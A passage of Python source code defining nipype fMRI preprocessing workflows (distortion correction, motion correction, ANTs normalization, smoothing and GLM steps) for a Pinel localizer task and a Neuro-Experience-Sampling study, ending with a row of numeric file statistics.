(apply_transforms, mean_norm_epi, [('output_image','in_file')]),
(mean_norm_epi, plot_normalization_check, [('out_file','wra_img')]),
(get_tr, build_xmat, [('TR','TR')]),
(get_onsets, build_xmat, [('onsetsFile', 'onsetsFile')]),
(make_cov, build_xmat, [('covariates','covFile')]),
(build_xmat, datasink, [('xmat', 'functional.@xmat'),
('plot', 'functional.@xmatplot')]),
(build_xmat, glm, [('xmat','xmatFile')]),
(smooth, glm, [('smoothed_file','epiFile')]),
(glm, datasink, [('betaImage','glm.@beta'),
('tstatImage','glm.@tstat'),
('pvalImage','glm.@pval')]),
(get_tr, build_xmat_con, [('TR','TR')]),
(get_onsets, build_xmat_con, [('onsetsFile', 'onsetsFile')]),
(make_cov, build_xmat_con, [('covariates','covFile')]),
(build_xmat_con, datasink, [('xmat', 'functional.@xmatcon'),
('plot', 'functional.@xmatconplot')]),
(build_xmat_con, glm_con, [('xmat','xmatFile')]),
(smooth, glm_con, [('smoothed_file','epiFile')]),
(glm_con, datasink, [('betaImage','glm.@betacon'),
('tstatImage','glm.@tstatcon'),
('pvalImage','glm.@pvalcon')]),
(get_tr, build_xmat_mvpa, [('TR','TR')]),
(get_onsets, build_xmat_mvpa, [('onsetsFile', 'onsetsFile')]),
(make_cov, build_xmat_mvpa, [('covariates','covFile')]),
(build_xmat_mvpa, datasink, [('xmat', 'functional.@xmatmvpa'),
('plot', 'functional.@xmatmvpaplot')]),
(build_xmat_mvpa, glm_mvpa, [('xmat','xmatFile')]),
(smooth, glm_mvpa, [('smoothed_file','epiFile')]),
(glm_mvpa, datasink, [('betaImage','glm.@betamvpa'),
('tstatImage','glm.@tstatmvpa'),
('pvalImage','glm.@pvalmvpa')]),
(apply_transforms, datasink, [('output_image', 'functional.@normalize')]),
(apply_transforms, smooth, [('output_image','in_file')]),
(smooth, datasink, [('smoothed_file','functional.@smooth')]),
(plot_realign, datasink, [('plot','functional.@plot_realign')]),
(plot_qa, datasink, [('plot','functional.@plot_qa')]),
(plot_normalization_check, datasink, [('plot','functional.@plot_normalization')]),
(make_cov, datasink, [('covariates','functional.@covariates')]),
(brain_extraction_ants, datasink, [('BrainExtractionBrain','structural.@struct')]),
(normalization, datasink, [('warped_image','structural.@normalize')])
])
## Old workflow using a single glm
# workflow.connect([
# (func_scans, realign_fsl, [('scan','in_file')]),
# (func_scans, get_tr, [('scan','fName')]),
# (func_scans, get_onsets, [('scan','fName')]),
# (realign_fsl, plot_realign, [('par_file','realignment_parameters')]),
# (realign_fsl, plot_qa, [('out_file','dat_img')]),
# (realign_fsl, art, [('out_file','realigned_files'),
# ('par_file','realignment_parameters')]),
# (realign_fsl, mean_epi, [('out_file','in_file')]),
# (realign_fsl, make_cov, [('par_file','realignment_parameters')]),
# (mean_epi, compute_mask, [('out_file','mean_volume')]),
# (compute_mask, art, [('brain_mask','mask_file')]),
# (art, make_cov, [('outlier_files','spike_id')]),
# (datasource, brain_extraction_ants, [('struct','anatomical_image')]),
# (brain_extraction_ants, coregistration, [('BrainExtractionBrain','fixed_image')]),
# (mean_epi, coregistration, [('out_file','moving_image')]),
# (brain_extraction_ants, normalization, [('BrainExtractionBrain','moving_image')]),
# (coregistration, merge_transforms, [('composite_transform','in2')]),
# (normalization, merge_transforms, [('composite_transform','in1')]),
# (merge_transforms, apply_transforms, [('out','transforms')]),
# (realign_fsl, apply_transforms, [('out_file','input_image')]),
# (apply_transforms, mean_norm_epi, [('output_image','in_file')]),
# (mean_norm_epi, plot_normalization_check, [('out_file','wra_img')]),
# (get_tr, build_xmat, [('TR','TR')]),
# (get_onsets, build_xmat, [('onsetsFile', 'onsetsFile')]),
# (make_cov, build_xmat, [('covariates','covFile')]),
# (build_xmat, datasink, [('xmat', 'functional.@xmat'),
# ('plot', 'functional.@xmatplot')]),
# (build_xmat, glm, [('xmat','xmatFile')]),
# (get_tr, build_xmat_con, [('TR','TR')]),
# (get_onsets, build_xmat_con, [('onsetsFile', 'onsetsFile')]),
# (make_cov, build_xmat_con, [('covariates','covFile')]),
# (build_xmat_con, datasink, [('xmat', 'functional.@xmat'),
# ('plot', 'functional.@xmatplot')]),
# (build_xmat_con, glm_con, [('xmat','xmatFile')]),
# (smooth, glm_con, [('smoothed_file','epiFile')]),
# (get_tr, build_xmat_mvpa, [('TR','TR')]),
# (get_onsets, build_xmat_mvpa, [('onsetsFile', 'onsetsFile')]),
# (make_cov, build_xmat_mvpa, [('covariates','covFile')]),
# (build_xmat_mvpa, datasink, [('xmat', 'functional.@xmat'),
# ('plot', 'functional.@xmatplot')]),
# (build_xmat_mvpa, glm_mvpa, [('xmat','xmatFile')]),
# (smooth, glm_mvpa, [('smoothed_file','epiFile')]),
# (glm_mvpa, datasink, [('betaImage','glm.@beta'),
# ('tstatImage','glm.@tstat'),
# ('pvalImage','glm.@pval')]),
# (smooth, glm, [('smoothed_file','epiFile')]),
# (glm, datasink, [('betaImage','glm.@beta'),
# ('tstatImage','glm.@tstat'),
# ('pvalImage','glm.@pval')]),
# (apply_transforms, datasink, [('output_image', 'functional.@normalize')]),
# (apply_transforms, smooth, [('output_image','in_file')]),
# (smooth, datasink, [('smoothed_file','functional.@smooth')]),
# (plot_realign, datasink, [('plot','functional.@plot_realign')]),
# (plot_qa, datasink, [('plot','functional.@plot_qa')]),
# (plot_normalization_check, datasink, [('plot','functional.@plot_normalization')]),
# (make_cov, datasink, [('covariates','functional.@covariates')]),
# (brain_extraction_ants, datasink, [('BrainExtractionBrain','structural.@struct')]),
# (normalization, datasink, [('warped_image','structural.@normalize')])
# ])
if not os.path.exists(os.path.join(output_dir,'Preprocsteps.png')):
workflow.write_graph(dotfilename=os.path.join(output_dir,'Preprocsteps'),format='png')
return workflow
def Pinel_Preproc_Pipeline(base_dir=None, output_dir=None, subject_id=None):
"""
Create a nipype preprocessing workflow to analyze data from the Pinel localizer task.
Pre-processing steps include:
Distortion correction (fsl)
Realignment/Motion Correction (fsl)
Artifact Detection (nipype)
Brain Extraction + Bias Correction (ANTs)
Coregistration (rigid) (ANTs)
Normalization to MNI 152 2mm (non-linear) (ANTs)
Qualitry Control figure generation:
- Realignment parameters
- Quality check of mean signal, sd and frame differences
- Normalization check
Args:
base_dir: path to raw data folder with subjects listed as sub-folders
output_dir: path where final outputted files and figures should go
resources_dir: path where template files for MNI and ANTs live
subject_id: subject to run (should match folder name)
Return:
workflow: A complete nipype workflow
"""
import os
from glob import glob
import matplotlib
matplotlib.use('Agg')
import nibabel as nib
from nipype.interfaces.io import DataSink, DataGrabber
from nipype.interfaces.utility import Merge, IdentityInterface, Function
from nipype.pipeline.engine import Node, Workflow
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates, Down_Sample_Precision
from cosanlab_preproc.utils import get_resource_path
from bids.grabbids import BIDSLayout
from nipype.interfaces.nipy.preprocess import ComputeMask
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces.ants.segmentation import BrainExtraction
from nipype.interfaces.ants import Registration, ApplyTransforms
from nipype.interfaces.fsl import MCFLIRT, TOPUP
from nipype.interfaces.fsl import ApplyTOPUP as APPLYTOPUP
from nipype.interfaces.fsl import Merge as MERGE
from nipype.interfaces.fsl.maths import MeanImage
from nipype.interfaces.fsl.utils import Smooth
###################################
### GLOBALS, PATHS ###
###################################
MNItemplate = os.path.join(get_resource_path(),'MNI152_T1_2mm_brain.nii.gz')
MNItemplatehasskull = os.path.join(get_resource_path(),'MNI152_T1_2mm.nii.gz')
bet_ants_template = os.path.join(get_resource_path(),'OASIS_template.nii.gz')
bet_ants_prob_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumProbabilityMask.nii.gz')
bet_ants_registration_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumRegistrationMask.nii.gz')
acquistions = [
'p1Xs2X3mmXsl48Xap',
'p1Xs4X3mmXsl48Xap',
'p1Xs6X3mmXsl48Xap',
'p1Xs8X3mmXsl48Xap',
]
encoding_file = os.path.join(base_dir,'encoding_file.txt')
###################################
### DATA INPUT ###
###################################
layout = BIDSLayout(base_dir)
#BIDS needs the 'sub' part of sid removed
subId = subject_id[4:]
#Straight up grab the single anat nifti
anat = layout.get(subject=subId,type='T1w',extensions='.nii.gz')[0].filename
#Get a list of all epis and wrap them in an iterable node
funcs = [f.filename for f in layout.get(subject=subId,type='bold',extensions='.nii.gz') if f.acquisition in acquistions]
func_scans = Node(IdentityInterface(fields=['scan']),name='func_scans')
func_scans.iterables = ('scan',funcs)
#Get a list of all distortion correction scans
dis_corrs = [f.filename for f in layout.get(subject=subId,type='bold',extensions='.nii.gz',task='discorr')]
#####################################
## DISTORTION CORRECTION ##
#####################################
#Merge AP and PA distortion correction scans
merge_discorr = Node(interface=MERGE(dimension='t'),name='merge_discorr')
merge_discorr.inputs.output_type = 'NIFTI_GZ'
merge_discorr.inputs.in_files = dis_corrs
#Create distortion correction map
topup = Node(interface=TOPUP(),name='topup')
topup.inputs.output_type = 'NIFTI_GZ'
topup.inputs.encoding_file = encoding_file
#Apply distortion correction to other scans
apply_topup = Node(interface=APPLYTOPUP(),name='apply_topup')
apply_topup.inputs.output_type = 'NIFTI_GZ'
apply_topup.inputs.method = 'jac'
apply_topup.inputs.encoding_file = encoding_file
###################################
### REALIGN ###
###################################
realign_fsl = Node(MCFLIRT(),name="realign")
realign_fsl.inputs.cost = 'mutualinfo'
realign_fsl.inputs.mean_vol = True
realign_fsl.inputs.output_type = 'NIFTI_GZ'
realign_fsl.inputs.save_mats = True
realign_fsl.inputs.save_rms = True
realign_fsl.inputs.save_plots = True
###################################
### MEAN EPIs ###
###################################
#For coregistration after realignment
mean_epi = Node(MeanImage(),name='mean_epi')
mean_epi.inputs.dimension = 'T'
#For after normalization is done to plot checks
mean_norm_epi = Node(MeanImage(),name='mean_norm_epi')
mean_norm_epi.inputs.dimension = 'T'
###################################
### MASK, ART, COV CREATION ###
###################################
compute_mask = Node(ComputeMask(), name='compute_mask')
compute_mask.inputs.m = .05
art = Node(ArtifactDetect(),name='art')
art.inputs.use_differences = [True, False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'FSL'
make_cov = Node(Create_Covariates(),name='make_cov')
###################################
### BRAIN EXTRACTION ###
###################################
brain_extraction_ants = Node(BrainExtraction(),name='brain_extraction')
brain_extraction_ants.inputs.anatomical_image = anat #from BIDS
brain_extraction_ants.inputs.dimension = 3
brain_extraction_ants.inputs.use_floatingpoint_precision = 1
brain_extraction_ants.inputs.num_threads = 12
brain_extraction_ants.inputs.brain_probability_mask = bet_ants_prob_mask
brain_extraction_ants.inputs.keep_temporary_files = 1
brain_extraction_ants.inputs.brain_template = bet_ants_template
brain_extraction_ants.inputs.extraction_registration_mask = bet_ants_registration_mask
###################################
### COREGISTRATION ###
###################################
coregistration = Node(Registration(), name='coregistration')
coregistration.inputs.float = False
coregistration.inputs.output_transform_prefix = "meanEpi2highres"
coregistration.inputs.transforms = ['Rigid']
coregistration.inputs.transform_parameters = [(0.1,), (0.1,)]
coregistration.inputs.number_of_iterations = [[1000,500,250,100]]
coregistration.inputs.dimension = 3
coregistration.inputs.num_threads = 12
coregistration.inputs.write_composite_transform = True
coregistration.inputs.collapse_output_transforms = True
coregistration.inputs.metric = ['MI']
coregistration.inputs.metric_weight = [1]
coregistration.inputs.radius_or_number_of_bins = [32]
coregistration.inputs.sampling_strategy = ['Regular']
coregistration.inputs.sampling_percentage = [0.25]
coregistration.inputs.convergence_threshold = [1.e-8]
coregistration.inputs.convergence_window_size = [10]
coregistration.inputs.smoothing_sigmas = [[3,2,1,0]]
coregistration.inputs.sigma_units = ['mm']
coregistration.inputs.shrink_factors = [[8,4,2,1]]
coregistration.inputs.use_estimate_learning_rate_once = [True]
coregistration.inputs.use_histogram_matching = [False]
coregistration.inputs.initial_moving_transform_com = True
coregistration.inputs.output_warped_image = True
coregistration.inputs.winsorize_lower_quantile = 0.01
coregistration.inputs.winsorize_upper_quantile = 0.99
###################################
### NORMALIZATION ###
###################################
#ANTS step through several different iterations starting with linear, affine and finally non-linear diffuseomorphic alignment. The settings below increase the run time but yield a better alignment solution
normalization = Node(Registration(),name='normalization')
normalization.inputs.float = False
normalization.inputs.collapse_output_transforms=True
normalization.inputs.convergence_threshold=[1e-06]
normalization.inputs.convergence_window_size=[10]
normalization.inputs.dimension = 3
normalization.inputs.fixed_image = MNItemplate #MNI 152 1mm
normalization.inputs.initial_moving_transform_com=True
normalization.inputs.metric=['MI', 'MI', 'CC']
normalization.inputs.metric_weight=[1.0]*3
normalization.inputs.number_of_iterations=[[1000, 500, 250, 100],
[1000, 500, 250, 100],
[100, 70, 50, 20]]
normalization.inputs.num_threads=12
normalization.inputs.output_transform_prefix = 'anat2template'
normalization.inputs.output_inverse_warped_image=True
normalization.inputs.output_warped_image = True
normalization.inputs.radius_or_number_of_bins=[32, 32, 4]
normalization.inputs.sampling_percentage=[0.25, 0.25, 1]
normalization.inputs.sampling_strategy=['Regular',
'Regular',
'None']
normalization.inputs.shrink_factors=[[8, 4, 2, 1]]*3
normalization.inputs.sigma_units=['vox']*3
normalization.inputs.smoothing_sigmas=[[3, 2, 1, 0]]*3
normalization.inputs.terminal_output='stream'
normalization.inputs.transforms = ['Rigid','Affine','SyN']
normalization.inputs.transform_parameters=[(0.1,),
(0.1,),
(0.1, 3.0, 0.0)]
normalization.inputs.use_histogram_matching=True
normalization.inputs.winsorize_lower_quantile=0.005
normalization.inputs.winsorize_upper_quantile=0.995
normalization.inputs.write_composite_transform=True
###################################
### APPLY TRANSFORMS AND SMOOTH ###
###################################
#The nodes above compute the required transformation matrices but don't actually apply them to the data. Here we're merging both matrices and applying them in a single transformation step to reduce the amount of data interpolation.
merge_transforms = Node(Merge(2), iterfield=['in2'], name ='merge_transforms')
apply_transforms = Node(ApplyTransforms(),iterfield=['input_image'],name='apply_transforms')
apply_transforms.inputs.input_image_type = 3
apply_transforms.inputs.float = False
apply_transforms.inputs.num_threads = 12
apply_transforms.inputs.environ = {}
apply_transforms.inputs.interpolation = 'BSpline'
apply_transforms.inputs.invert_transform_flags = [False, False]
apply_transforms.inputs.terminal_output = 'stream'
apply_transforms.inputs.reference_image = MNItemplate
#Use FSL for smoothing
smooth = Node(Smooth(),name='smooth')
smooth.inputs.sigma = 6.0
#####################################
### DOWNSAMPLE PRECISION ###
#####################################
down_samp = Node(Down_Sample_Precision(),name='down_samp')
###################################
### PLOTS ###
###################################
plot_realign = Node(Plot_Realignment_Parameters(),name="plot_realign")
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
plot_normalization_check = Node(Plot_Coregistration_Montage(),name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = MNItemplatehasskull
###################################
### DATA OUTPUT ###
###################################
#Collect all final outputs in the output dir and get rid of file name additions
datasink = Node(DataSink(),name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
datasink.inputs.substitutions = [('_scan_..mnt..Raw..' + subject_id + '..func..',''),
(subject_id+'_acq-p1X',''),
('X3mmXsl48Xap_bold.nii.gz','')]
###################################
### HOOK IT ALL CAPTAIN! ###
###################################
workflow = Workflow(name='Preprocessing')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([
(merge_discorr, topup, [('merged_file','in_file')]),
(topup, apply_topup,[('out_fieldcoef','in_topup_fieldcoef'),
('out_movpar','in_topup_movpar')]),
(func_scans, apply_topup, [('scan','in_files')]),
(apply_topup, realign_fsl, [('out_corrected','in_file')]),
(realign_fsl, plot_realign, [('par_file','realignment_parameters')]),
(realign_fsl, plot_qa, [('out_file','dat_img')]),
(realign_fsl, art, [('out_file','realigned_files'),
('par_file','realignment_parameters')]),
(realign_fsl, mean_epi, [('out_file','in_file')]),
(realign_fsl, make_cov, [('par_file','realignment_parameters')]),
(mean_epi, compute_mask, [('out_file','mean_volume')]),
(compute_mask, art, [('brain_mask','mask_file')]),
(art, make_cov, [('outlier_files','spike_id')]),
(brain_extraction_ants, coregistration, [('BrainExtractionBrain','fixed_image')]),
(mean_epi, coregistration, [('out_file','moving_image')]),
(brain_extraction_ants, normalization, [('BrainExtractionBrain','moving_image')]),
(coregistration, merge_transforms, [('composite_transform','in2')]),
(normalization, merge_transforms, [('composite_transform','in1')]),
(merge_transforms, apply_transforms, [('out','transforms')]),
(realign_fsl, apply_transforms, [('out_file','input_image')]),
(apply_transforms, mean_norm_epi, [('output_image','in_file')]),
(mean_norm_epi, plot_normalization_check, [('out_file','wra_img')]),
(apply_transforms, smooth, [('output_image','in_file')]),
(smooth, down_samp, [('smoothed_file','in_file')]),
(down_samp, datasink, [('out_file','functional.@down_samp')]),
(plot_realign, datasink, [('plot','functional.@plot_realign')]),
(plot_qa, datasink, [('plot','functional.@plot_qa')]),
(plot_normalization_check, datasink, [('plot','functional.@plot_normalization')]),
(make_cov, datasink, [('covariates','functional.@covariates')]),
(brain_extraction_ants, datasink, [('BrainExtractionBrain','structural.@struct')]),
(normalization, datasink, [('warped_image','structural.@normalize')])
])
if not os.path.exists(os.path.join(output_dir,'Preprocsteps.png')):
workflow.write_graph(dotfilename=os.path.join(output_dir,'Preprocsteps'),format='png')
return workflow
def NeuroExpSampling_PreProc_Pipeline(base_dir=None, output_dir=None, subject_id=None):
"""
Create a nipype preprocessing workflow to analyze data from the Neuro-Experience-Sampling scan data.
This data was originally collected with SMS 8, TR = 419ms.
Pre-processing steps include:
Distortion correction (fsl)
Realignment/Motion Correction (fsl)
Artifact Detection (nipype)
Brain Extraction + Bias Correction (ANTs)
Coregistration (rigid) (ANTs)
Normalization to MNI 152 2mm (non-linear) (ANTs)
Low-pass filtering (nltools/nilearn) - filter out high-freq SMS physio noise
Qualitry Control figure generation:
- Realignment parameters
- Quality check of mean signal, sd and frame differences
- Normalization check
Args:
base_dir: path to raw data folder with subjects listed as sub-folders
output_dir: path where final outputted files and figures should go
resources_dir: path where template files for MNI and ANTs live
subject_id: subject to run (should match folder name)
Return:
workflow: A complete nipype workflow
"""
import os
from glob import glob
import matplotlib
matplotlib.use('Agg')
import nibabel as nib
from nipype.interfaces.io import DataSink, DataGrabber
from nipype.interfaces.utility import Merge, IdentityInterface, Function
from nipype.pipeline.engine import Node, Workflow
from cosanlab_preproc.interfaces import Plot_Coregistration_Montage, Plot_Quality_Control, Plot_Realignment_Parameters, Create_Covariates, Down_Sample_Precision
from cosanlab_preproc.utils import get_resource_path
from bids.grabbids import BIDSLayout
from nipype.interfaces.nipy.preprocess import ComputeMask
from nipype.algorithms.rapidart import ArtifactDetect
from nipype.interfaces.ants.segmentation import BrainExtraction
from nipype.interfaces.ants import Registration, ApplyTransforms
from nipype.interfaces.fsl import MCFLIRT, TOPUP
from nipype.interfaces.fsl import ApplyTOPUP as APPLYTOPUP
from nipype.interfaces.fsl import Merge as MERGE
from nipype.interfaces.fsl.maths import MeanImage
from nipype.interfaces.fsl.utils import Smooth
###################################
### GLOBALS, PATHS ###
###################################
MNItemplate = os.path.join(get_resource_path(),'MNI152_T1_3mm_brain.nii.gz')
MNItemplatehasskull = os.path.join(get_resource_path(),'MNI152_T1_3mm.nii.gz')
bet_ants_template = os.path.join(get_resource_path(),'OASIS_template.nii.gz')
bet_ants_prob_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumProbabilityMask.nii.gz')
bet_ants_registration_mask = os.path.join(get_resource_path(),'OASIS_BrainCerebellumRegistrationMask.nii.gz')
acquistions = [
'p1Xs2X3mmXsl48Xap',
'p1Xs4X3mmXsl48Xap',
'p1Xs6X3mmXsl48Xap',
'p1Xs8X3mmXsl48Xap',
]
encoding_file = os.path.join(base_dir,'encoding_file.txt')
###################################
### DATA INPUT ###
###################################
layout = BIDSLayout(base_dir)
#BIDS needs the 'sub' part of sid removed
subId = subject_id[4:]
#Straight up grab the single anat nifti
anat = layout.get(subject=subId,type='T1w',extensions='.nii.gz')[0].filename
#Get a list of all epis and wrap them in an iterable node
funcs = [f.filename for f in layout.get(subject=subId,type='bold',extensions='.nii.gz') if f.acquisition in acquistions]
func_scans = Node(IdentityInterface(fields=['scan']),name='func_scans')
func_scans.iterables = ('scan',funcs)
#Get a list of all distortion correction scans
dis_corrs = [f.filename for f in layout.get(subject=subId,type='bold',extensions='.nii.gz',task='discorr')]
#####################################
## DISTORTION CORRECTION ##
#####################################
#Merge AP and PA distortion correction scans
merge_discorr = Node(interface=MERGE(dimension='t'),name='merge_discorr')
merge_discorr.inputs.output_type = 'NIFTI_GZ'
merge_discorr.inputs.in_files = dis_corrs
#Create distortion correction map
topup = Node(interface=TOPUP(),name='topup')
topup.inputs.output_type = 'NIFTI_GZ'
topup.inputs.encoding_file = encoding_file
#Apply distortion correction to other scans
apply_topup = Node(interface=APPLYTOPUP(),name='apply_topup')
apply_topup.inputs.output_type = 'NIFTI_GZ'
apply_topup.inputs.method = 'jac'
apply_topup.inputs.encoding_file = encoding_file
###################################
### REALIGN ###
###################################
realign_fsl = Node(MCFLIRT(),name="realign")
realign_fsl.inputs.cost = 'mutualinfo'
realign_fsl.inputs.mean_vol = True
realign_fsl.inputs.output_type = 'NIFTI_GZ'
realign_fsl.inputs.save_mats = True
realign_fsl.inputs.save_rms = True
realign_fsl.inputs.save_plots = True
###################################
### MEAN EPIs ###
###################################
#For coregistration after realignment
mean_epi = Node(MeanImage(),name='mean_epi')
mean_epi.inputs.dimension = 'T'
#For after normalization is done to plot checks
mean_norm_epi = Node(MeanImage(),name='mean_norm_epi')
mean_norm_epi.inputs.dimension = 'T'
###################################
### MASK, ART, COV CREATION ###
###################################
compute_mask = Node(ComputeMask(), name='compute_mask')
compute_mask.inputs.m = .05
art = Node(ArtifactDetect(),name='art')
art.inputs.use_differences = [True, False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'FSL'
make_cov = Node(Create_Covariates(),name='make_cov')
###################################
### BRAIN EXTRACTION ###
###################################
brain_extraction_ants = Node(BrainExtraction(),name='brain_extraction')
brain_extraction_ants.inputs.anatomical_image = anat #from BIDS
brain_extraction_ants.inputs.dimension = 3
brain_extraction_ants.inputs.use_floatingpoint_precision = 1
brain_extraction_ants.inputs.num_threads = 12
brain_extraction_ants.inputs.brain_probability_mask = bet_ants_prob_mask
brain_extraction_ants.inputs.keep_temporary_files = 1
brain_extraction_ants.inputs.brain_template = bet_ants_template
brain_extraction_ants.inputs.extraction_registration_mask = bet_ants_registration_mask
###################################
### COREGISTRATION ###
###################################
coregistration = Node(Registration(), name='coregistration')
coregistration.inputs.float = False
coregistration.inputs.output_transform_prefix = "meanEpi2highres"
coregistration.inputs.transforms = ['Rigid']
coregistration.inputs.transform_parameters = [(0.1,), (0.1,)]
coregistration.inputs.number_of_iterations = [[1000,500,250,100]]
coregistration.inputs.dimension = 3
coregistration.inputs.num_threads = 12
coregistration.inputs.write_composite_transform = True
coregistration.inputs.collapse_output_transforms = True
coregistration.inputs.metric = ['MI']
coregistration.inputs.metric_weight = [1]
coregistration.inputs.radius_or_number_of_bins = [32]
coregistration.inputs.sampling_strategy = ['Regular']
coregistration.inputs.sampling_percentage = [0.25]
coregistration.inputs.convergence_threshold = [1.e-8]
coregistration.inputs.convergence_window_size = [10]
coregistration.inputs.smoothing_sigmas = [[3,2,1,0]]
coregistration.inputs.sigma_units = ['mm']
coregistration.inputs.shrink_factors = [[8,4,2,1]]
coregistration.inputs.use_estimate_learning_rate_once = [True]
coregistration.inputs.use_histogram_matching = [False]
coregistration.inputs.initial_moving_transform_com = True
coregistration.inputs.output_warped_image = True
coregistration.inputs.winsorize_lower_quantile = 0.01
coregistration.inputs.winsorize_upper_quantile = 0.99
###################################
### NORMALIZATION ###
###################################
#ANTS step through several different iterations starting with linear, affine and finally non-linear diffuseomorphic alignment. The settings below increase the run time but yield a better alignment solution
normalization = Node(Registration(),name='normalization')
normalization.inputs.float = False
normalization.inputs.collapse_output_transforms=True
normalization.inputs.convergence_threshold=[1e-06]
normalization.inputs.convergence_window_size=[10]
normalization.inputs.dimension = 3
normalization.inputs.fixed_image = MNItemplate #MNI 152 1mm
normalization.inputs.initial_moving_transform_com=True
normalization.inputs.metric=['MI', 'MI', 'CC']
normalization.inputs.metric_weight=[1.0]*3
normalization.inputs.number_of_iterations=[[1000, 500, 250, 100],
[1000, 500, 250, 100],
[100, 70, 50, 20]]
normalization.inputs.num_threads=12
normalization.inputs.output_transform_prefix = 'anat2template'
normalization.inputs.output_inverse_warped_image=True
normalization.inputs.output_warped_image = True
normalization.inputs.radius_or_number_of_bins=[32, 32, 4]
normalization.inputs.sampling_percentage=[0.25, 0.25, 1]
normalization.inputs.sampling_strategy=['Regular',
'Regular',
'None']
normalization.inputs.shrink_factors=[[8, 4, 2, 1]]*3
normalization.inputs.sigma_units=['vox']*3
normalization.inputs.smoothing_sigmas=[[3, 2, 1, 0]]*3
normalization.inputs.terminal_output='stream'
normalization.inputs.transforms = ['Rigid','Affine','SyN']
normalization.inputs.transform_parameters=[(0.1,),
(0.1,),
(0.1, 3.0, 0.0)]
normalization.inputs.use_histogram_matching=True
normalization.inputs.winsorize_lower_quantile=0.005
normalization.inputs.winsorize_upper_quantile=0.995
normalization.inputs.write_composite_transform=True
###################################
### APPLY TRANSFORMS AND SMOOTH ###
###################################
#The nodes above compute the required transformation matrices but don't actually apply them to the data. Here we're merging both matrices and applying them in a single transformation step to reduce the amount of data interpolation.
merge_transforms = Node(Merge(2), iterfield=['in2'], name ='merge_transforms')
apply_transforms = Node(ApplyTransforms(),iterfield=['input_image'],name='apply_transforms')
apply_transforms.inputs.input_image_type = 3
apply_transforms.inputs.float = False
apply_transforms.inputs.num_threads = 12
apply_transforms.inputs.environ = {}
apply_transforms.inputs.interpolation = 'BSpline'
apply_transforms.inputs.invert_transform_flags = [False, False]
apply_transforms.inputs.terminal_output = 'stream'
apply_transforms.inputs.reference_image = MNItemplate
#Use FSL for smoothing
smooth = Node(Smooth(),name='smooth')
smooth.inputs.sigma = 6.0
#####################################
### DOWNSAMPLE PRECISION ###
#####################################
down_samp = Node(Down_Sample_Precision(),name='down_samp')
###################################
### PLOTS ###
###################################
plot_realign = Node(Plot_Realignment_Parameters(),name="plot_realign")
plot_qa = Node(Plot_Quality_Control(),name="plot_qa")
plot_normalization_check = Node(Plot_Coregistration_Montage(),name="plot_normalization_check")
plot_normalization_check.inputs.canonical_img = MNItemplatehasskull
###################################
### DATA OUTPUT ###
###################################
#Collect all final outputs in the output dir and get rid of file name additions
datasink = Node(DataSink(),name='datasink')
datasink.inputs.base_directory = output_dir
datasink.inputs.container = subject_id
datasink.inputs.substitutions = [('_scan_..mnt..Raw..' + subject_id + '..func..',''),
(subject_id+'_acq-p1X',''),
('X3mmXsl48Xap_bold.nii.gz','')]
###################################
### HOOK IT ALL CAPTAIN! ###
###################################
workflow = Workflow(name='Preprocessing')
workflow.base_dir = os.path.join(base_dir,subject_id)
workflow.connect([
(merge_discorr, topup, [('merged_file','in_file')]),
(topup, apply_topup,[('out_fieldcoef','in_topup_fieldcoef'),
('out_movpar','in_topup_movpar')]),
(func_scans, apply_topup, [('scan','in_files')]),
(apply_topup, realign_fsl, [('out_corrected','in_file')]),
(realign_fsl, plot_realign, [('par_file','realignment_parameters')]),
(realign_fsl, plot_qa, [('out_file','dat_img')]),
(realign_fsl, art, [('out_file','realigned_files'),
('par_file','realignment_parameters')]),
(realign_fsl, mean_epi, [('out_file','in_file')]),
(realign_fsl, make_cov, [('par_file','realignment_parameters')]),
(mean_epi, compute_mask, [('out_file','mean_volume')]),
(compute_mask, art, [('brain_mask','mask_file')]),
(art, make_cov, [('outlier_files','spike_id')]),
(brain_extraction_ants, coregistration, [('BrainExtractionBrain','fixed_image')]),
(mean_epi, coregistration, [('out_file','moving_image')]),
(brain_extraction_ants, normalization, [('BrainExtractionBrain','moving_image')]),
(coregistration, merge_transforms, [('composite_transform','in2')]),
(normalization, merge_transforms, [('composite_transform','in1')]),
(merge_transforms, apply_transforms, [('out','transforms')]),
(realign_fsl, apply_transforms, [('out_file','input_image')]),
(apply_transforms, mean_norm_epi, [('output_image','in_file')]),
(mean_norm_epi, plot_normalization_check, [('out_file','wra_img')]),
(apply_transforms, smooth, [('output_image','in_file')]),
(smooth, down_samp, [('smoothed_file','in_file')]),
(down_samp, datasink, [('out_file','functional.@down_samp')]),
(plot_realign, datasink, [('plot','functional.@plot_realign')]),
(plot_qa, datasink, [('plot','functional.@plot_qa')]),
(plot_normalization_check, datasink, [('plot','functional.@plot_normalization')]),
(make_cov, datasink, [('covariates','functional.@covariates')]),
(brain_extraction_ants, datasink, [('BrainExtractionBrain','structural.@struct')]),
(normalization, datasink, [('warped_image','structural.@normalize')])
])
if not os.path.exists(os.path.join(output_dir,'Preprocsteps.png')):
workflow.write_graph(dotfilename=os.path.join(output_dir,'Preprocsteps'),format='png')
return workflow
| 47.371609
| 235
| 0.629149
| 10,605
| 97,775
| 5.579821
| 0.073362
| 0.034677
| 0.017913
| 0.012252
| 0.909589
| 0.899652
| 0.890121
| 0.886014
| 0.883412
| 0.880708
| 0
| 0.011902
| 0.1991
| 97,775
| 2,063
| 236
| 47.394571
| 0.743755
| 0.218082
| 0
| 0.836993
| 0
| 0
| 0.139484
| 0.032377
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008446
| false
| 0
| 0.098818
| 0
| 0.115709
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
